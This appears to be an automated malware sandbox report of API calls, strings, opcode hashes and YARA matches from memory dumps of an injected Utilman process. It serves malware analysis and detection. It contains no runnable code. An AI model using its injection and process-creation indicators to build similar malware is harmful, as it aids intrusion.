                                                                                            • Opcode Fuzzy Hash: 2875a14c3a711f444044c855eb9c7ecbdd29c215752dc0ecbdd80d119122922f
                                                                                            • Instruction Fuzzy Hash: 2911A075A20354BAD720EBA4CC01FAFB7ACDF85700F104209F948AB280D7B07A55C7E6
                                                                                            APIs
                                                                                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 03229717
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID:
                                                                                            • API String ID: 3535843008-0
                                                                                            • Opcode ID: 081854369c831ec027b45b511c34f41f77e81ad7b19e29eddcfbdd3c68e28a6d
                                                                                            • Instruction ID: bbc212c691cbe0ea075c4aee438c9b5e0f913aeb1225b3ec0102ac7513bcd0ca
                                                                                            • Opcode Fuzzy Hash: 081854369c831ec027b45b511c34f41f77e81ad7b19e29eddcfbdd3c68e28a6d
                                                                                            • Instruction Fuzzy Hash: 5DE0463A2203147BC220EA5ACC01F9B776CDFC6710F404415FA88AB241C6B1B91587B1
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 1ec2d6d826f10378175f62fc350214b4c114a1dbe6458301e9c321461785810e
                                                                                            • Instruction ID: 3d482707dd8f69b75bed35baf40464969061f542f5e3494c58121e6b15323c14
                                                                                            • Opcode Fuzzy Hash: 1ec2d6d826f10378175f62fc350214b4c114a1dbe6458301e9c321461785810e
                                                                                            • Instruction Fuzzy Hash: A590026220340013460572584565616502A87E0201B95C021F1019590DC62989917125
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 39c0aed62585501d3e834ff33859630c622b148dd0f8b82a40b7e2002195139b
                                                                                            • Instruction ID: c6c12081e627aeba4b6a0f8251a0d7984858d43f74954318814d58f3d5042391
                                                                                            • Opcode Fuzzy Hash: 39c0aed62585501d3e834ff33859630c622b148dd0f8b82a40b7e2002195139b
                                                                                            • Instruction Fuzzy Hash: 6790023260640812D65072584565746102587D0301F95C011B0029654D87598B5576A1
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: f512195efd5c382fe1ed985810cb0fbdb4b829df3f7697209b1654d783090618
                                                                                            • Instruction ID: ef930d4db86366d1e97577d36a9a4d87b921d589f424424e30eda34fa21fbc40
                                                                                            • Opcode Fuzzy Hash: f512195efd5c382fe1ed985810cb0fbdb4b829df3f7697209b1654d783090618
                                                                                            • Instruction Fuzzy Hash: BC90023220240812D6807258455564A102587D1301FD5C015B002A654DCB198B5977A1
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 463e66a3539d667bcbfd99274034d61e3d4e74d4e9c22f493aaccfd5a49b6ad6
                                                                                            • Instruction ID: 5173e9b7dcd0375637aa97baeae361d2f5f6d6761b988e6612c8b0e85958ce78
                                                                                            • Opcode Fuzzy Hash: 463e66a3539d667bcbfd99274034d61e3d4e74d4e9c22f493aaccfd5a49b6ad6
                                                                                            • Instruction Fuzzy Hash: D290023220644852D64072584555A46103587D0305F95C011B0069694D97298E55B661
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: cc96b7e762181788b58175f7fbc43e374e00d36ea9b8e000ca120190d64c97b3
                                                                                            • Instruction ID: 665a4dbe883506178efb668c700562422b5c5451cf7344089f593c89dd14603e
                                                                                            • Opcode Fuzzy Hash: cc96b7e762181788b58175f7fbc43e374e00d36ea9b8e000ca120190d64c97b3
                                                                                            • Instruction Fuzzy Hash: C6900226212400130605B6580755507106687D5351395C021F101A550CD72589616121
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 8b86f521b16a30be5beefbc50776fb7bc32a05c0d5119edc278bc5572c87c416
                                                                                            • Instruction ID: d821cfcbf4e6e30c01fc39d744a38ec6f4beeb5f2ca5c2dcd22055bc8eda2a6f
                                                                                            • Opcode Fuzzy Hash: 8b86f521b16a30be5beefbc50776fb7bc32a05c0d5119edc278bc5572c87c416
                                                                                            • Instruction Fuzzy Hash: 48900226222400120645B658075550B146597D63513D5C015F141B590CC72589656321
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 6dae4f6e2423cec3e712c256637c4e98568f92f0b52f8fc51b19a7a6df4a6487
                                                                                            • Instruction ID: 00da2686c5c9ed1fb92536e306d20a5027d13bb44d300dbf3548aad90911869f
                                                                                            • Opcode Fuzzy Hash: 6dae4f6e2423cec3e712c256637c4e98568f92f0b52f8fc51b19a7a6df4a6487
                                                                                            • Instruction Fuzzy Hash: BF90023260650412D60072584665706202587D0201FA5C411B0429568D87998A5175A2
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 4198d1fbfdef1313e7b8b726291fbba4c52db39cc680a469bbfc522683599704
                                                                                            • Instruction ID: 47dd26b0aaec8c6ef50d4dae38df52a5a116681eb96fb6084ede1fc412a4453f
                                                                                            • Opcode Fuzzy Hash: 4198d1fbfdef1313e7b8b726291fbba4c52db39cc680a469bbfc522683599704
                                                                                            • Instruction Fuzzy Hash: 7E90022224645112D650725C45556165025A7E0201F95C021B0819594D865989557221
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(000007D0), ref: 03223D6B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID: net.dll$wininet.dll
                                                                                            • API String ID: 3472027048-1269752229
                                                                                            • Opcode ID: 6c9133d1e965fe7aa21172f264dd81452814e44aa392cc508fafd907f1268b3c
                                                                                            • Instruction ID: cfb325ac11408b4286ce7cc25900352db34ff21716dc0864564c7440c8b57c85
                                                                                            • Opcode Fuzzy Hash: 6c9133d1e965fe7aa21172f264dd81452814e44aa392cc508fafd907f1268b3c
                                                                                            • Instruction Fuzzy Hash: DD31AEB5A11305BBD714DFA4CC80FEABBB9FB88700F00411CEA196B240C7B4B6508BA4
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: InitializeUninitialize
                                                                                            • String ID: @J7<
                                                                                            • API String ID: 3442037557-2016760708
                                                                                            • Opcode ID: 9cec1fc74173a054063b0e3a9ca5711a57ef5eb2096e9e0a1daa5db9cdefdeaf
                                                                                            • Instruction ID: d8408f025adc62a75a281198fa0612bf59e69fb1b667bfbe5250da09badeba62
                                                                                            • Opcode Fuzzy Hash: 9cec1fc74173a054063b0e3a9ca5711a57ef5eb2096e9e0a1daa5db9cdefdeaf
                                                                                            • Instruction Fuzzy Hash: 6F314376A1020AAFDB00DFD8DD809EFB7B9BF88304F148559E515EB214D771EE458BA0
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: InitializeUninitialize
                                                                                            • String ID: @J7<
                                                                                            • API String ID: 3442037557-2016760708
                                                                                            • Opcode ID: c808021e2a3c39e640a4de8537a02ca2e83a78dfc9a78bfeb8bc4f2257ca6f9f
                                                                                            • Instruction ID: 9b4d5212f8b027fea2b83fc6854ab5f871afefefa15568df003c6ce4f99a8752
                                                                                            • Opcode Fuzzy Hash: c808021e2a3c39e640a4de8537a02ca2e83a78dfc9a78bfeb8bc4f2257ca6f9f
                                                                                            • Instruction Fuzzy Hash: 1E3141B6A1020AAFDB00DFD8DD809EEB7B9BF88304B148559E515AB214D771EE458BA0
                                                                                            APIs
                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03214822
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Load
                                                                                            • String ID:
                                                                                            • API String ID: 2234796835-0
                                                                                            • Opcode ID: f729aad71b325cdb97dbeb40763933413b5d6b7fb509c19989d913dea0fc555e
                                                                                            • Instruction ID: 04d1d69dc96c9bc23c3c01ff655c7a99ab78ee7d394e22c7d264db11180f564a
                                                                                            • Opcode Fuzzy Hash: f729aad71b325cdb97dbeb40763933413b5d6b7fb509c19989d913dea0fc555e
                                                                                            • Instruction Fuzzy Hash: 59015EBAD1020EBBDB10EBA1DD41FDDB7B89B14208F0442A5E9089B240F671EB55CB91
                                                                                            APIs
                                                                                            • CreateProcessInternalW.KERNELBASE(?,?,?,?,0321853E,00000010,?,?,?,00000044,?,00000010,0321853E,?,?,?), ref: 03229B40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateInternalProcess
                                                                                            • String ID:
                                                                                            • API String ID: 2186235152-0
                                                                                            • Opcode ID: ac35a4eddf925d9254ffae4fe8b817297ef76e6dcc5b849ef643c183df329464
                                                                                            • Instruction ID: 2e1f87aae805cf36c69a71d823b6ccd86e67e72db628f300391e6d2e1f628652
                                                                                            • Opcode Fuzzy Hash: ac35a4eddf925d9254ffae4fe8b817297ef76e6dcc5b849ef643c183df329464
                                                                                            • Instruction Fuzzy Hash: 7701D2B6214208BFCB44DE99DC80EEB77ADAF8C754F008208FA0DE7241D670F8518BA4
                                                                                            APIs
                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03209F65
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateThread
                                                                                            • String ID:
                                                                                            • API String ID: 2422867632-0
                                                                                            • Opcode ID: 461ec973f1ab384a15514dffaaff90072fb645da1ee63792b85c87c4d6b1c30b
                                                                                            • Instruction ID: 7e0b44a0a8023645ef8146a288e0a1bd730fdb4f49a13611cec208c943e9152c
                                                                                            • Opcode Fuzzy Hash: 461ec973f1ab384a15514dffaaff90072fb645da1ee63792b85c87c4d6b1c30b
                                                                                            • Instruction Fuzzy Hash: C4F0307735431436E220A6A9AC02FDBA64C8B84B61F150029F60DDA1C1D9D6B48142A5
                                                                                            APIs
                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03209F65
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateThread
                                                                                            • String ID:
                                                                                            • API String ID: 2422867632-0
                                                                                            • Opcode ID: 4be685d65ea84c00f8203d6b106098ddb1036104ace067bab6cd390d25c19962
                                                                                            • Instruction ID: 7f8b24113899f115150ad92ab7a03a52ea6b9cb134c80b038f3fdbacfbf7cef3
                                                                                            • Opcode Fuzzy Hash: 4be685d65ea84c00f8203d6b106098ddb1036104ace067bab6cd390d25c19962
                                                                                            • Instruction Fuzzy Hash: 7DF0927725471436E231B2BD9C02FCBBA4C8F85B50F194068F70DAF2C2D9E6B48082E5
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(03211C66,?,032258B9,03211C66,0322587F,032258B9,?,03211C66,0322587F,00001000,?,?,00000000), ref: 03229A3F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: 1e5b17512e1e55516f8326c9c16891b6268a9042548c139125952dda1877ec81
                                                                                            • Instruction ID: 34cc0d6a0786b34ae890902775ea0d50bc59cd3ba6d534f8ea398b45b8a9febe
                                                                                            • Opcode Fuzzy Hash: 1e5b17512e1e55516f8326c9c16891b6268a9042548c139125952dda1877ec81
                                                                                            • Instruction Fuzzy Hash: FDE06576210305BFCA14EF99DC41FAB37ACEFC8710F004019F908AB242D670B8118AB8
                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,13A0E445,00000007,00000000,00000004,00000000,03214021,000000F4), ref: 03229A8F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3298025750-0
                                                                                            • Opcode ID: 60ff4789dde42194b856a07be318009ab749fac2426b1be3e6f4cf8e154f64d5
                                                                                            • Instruction ID: cf6f283a649c9e77250af4f774aca13221e8440b5ae795a1e6f88a91778ca6f4
                                                                                            • Opcode Fuzzy Hash: 60ff4789dde42194b856a07be318009ab749fac2426b1be3e6f4cf8e154f64d5
                                                                                            • Instruction Fuzzy Hash: 1EE0657A224304BBD610EE99DC40E9B37ACEF88710F004019FA08AB241C6B1B8108BB4
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,03211F60,032281BE,0322587F,03211F2D), ref: 032183A3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 900ad9019d086012a3bb844db6a68a08cd87e7c57346aab330890379bc71db7f
                                                                                            • Instruction ID: 7de7cf50f1439ebbfefbf86df0d7ce0768edd250a969abc28d60b808356d446c
                                                                                            • Opcode Fuzzy Hash: 900ad9019d086012a3bb844db6a68a08cd87e7c57346aab330890379bc71db7f
                                                                                            • Instruction Fuzzy Hash: BDD05E766A03053FF600F7F4CC47F56328D9B58654F084068B90CDB2C2EDA5F05045A6
                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(?,00000111), ref: 03211047
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID:
                                                                                            • API String ID: 1836367815-0
                                                                                            • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                            • Instruction ID: 4645555157aaab0d150ce4fece02a9c98b8802bf4f5b660e6cb1b3447409737b
                                                                                            • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                            • Instruction Fuzzy Hash: 76D02277B0010C7AEA1285C5ACC1CFFB76CEB84AA6F0040A3FF08E2080E6319D120BB0
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE ref: 032185AC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
                                                                                            • Instruction ID: 37aa049de9b21f5c221899d502f18840e88daf2e690d4fd587112c0fbf971aa2
                                                                                            • Opcode Fuzzy Hash: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
                                                                                            • Instruction Fuzzy Hash: 05C08CB123000916EB3089FC79882A37389DBA233CB1C0A10F43DD94E8D13298F7A001
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: c95cf614a9aa18205dc4bc2dbf6548e1c6e8f7e7fa50bdc1f78ba6ab1ffecb18
                                                                                            • Instruction ID: a3b2fce57a8d07bfe45fcf432ae8cb8150c2e4aa86f34669a91a0e2ddd45d866
                                                                                            • Opcode Fuzzy Hash: c95cf614a9aa18205dc4bc2dbf6548e1c6e8f7e7fa50bdc1f78ba6ab1ffecb18
                                                                                            • Instruction Fuzzy Hash: 72B09B729025D5D5DF11E7604709B1B791177D0701F65C461E2174641E473CC1E1F175
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4563317967.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_5400000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                            • API String ID: 0-3754132690
                                                                                            • Opcode ID: adb72f32349823912660fa9318eaa816488cf661e96bc489d8941ceb0da049aa
                                                                                            • Instruction ID: 231798bc8c54c4243b91c56863171895752ac9faad60621ee54830b88b8a4929
                                                                                            • Opcode Fuzzy Hash: adb72f32349823912660fa9318eaa816488cf661e96bc489d8941ceb0da049aa
                                                                                            • Instruction Fuzzy Hash: F1917DF04083948AC7158F58A0652AFFFB1EBC6304F15856DE7A6BB243C3BE89158B85
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4563317967.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_5400000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: "5,;$(5/+$)+-)$,5+5$.5*2$.5+;$/"5N$3Lru$3PSO$4.(,$4.(,$4/(/$5"/;$5(-$5(-;$;UO;$;Zkk$;\~x$H;Hz$VW7;$Vtar$Xsit$ZTW4$ZTWY$pt2;$v~4($wrp~$wwz4$w~L~$yPro$}zir
                                                                                            • API String ID: 0-518239860
                                                                                            • Opcode ID: 673b638450db9726f75077e2047301e5fe0874b7cbf5c623e85d9397eb220102
                                                                                            • Instruction ID: 749b9fff39d8fe6ff7f17d67791c5f605a7b35f77154343daa61f0430568a654
                                                                                            • Opcode Fuzzy Hash: 673b638450db9726f75077e2047301e5fe0874b7cbf5c623e85d9397eb220102
                                                                                            • Instruction Fuzzy Hash: 353138B081434CDBCF19DF85E5806DDBB72FB04385F809119E8096F358CAB58A56CB89
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                            • API String ID: 48624451-2108815105
                                                                                            • Opcode ID: 2834c42b69d9c03705a608e4d4a2814423aaa5b98809bb784f8fcffa8becd9d1
                                                                                            • Instruction ID: a9f76ed828f9a577a9101ddcccdcfc22c0d7f888f56a740542c9f0a7ad2edc99
                                                                                            • Opcode Fuzzy Hash: 2834c42b69d9c03705a608e4d4a2814423aaa5b98809bb784f8fcffa8becd9d1
                                                                                            • Instruction Fuzzy Hash: 9B51F6B6B04126BFCF24DFA8899097EF7F9BF08201B548269E4B5D7641E374DE1087A0
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
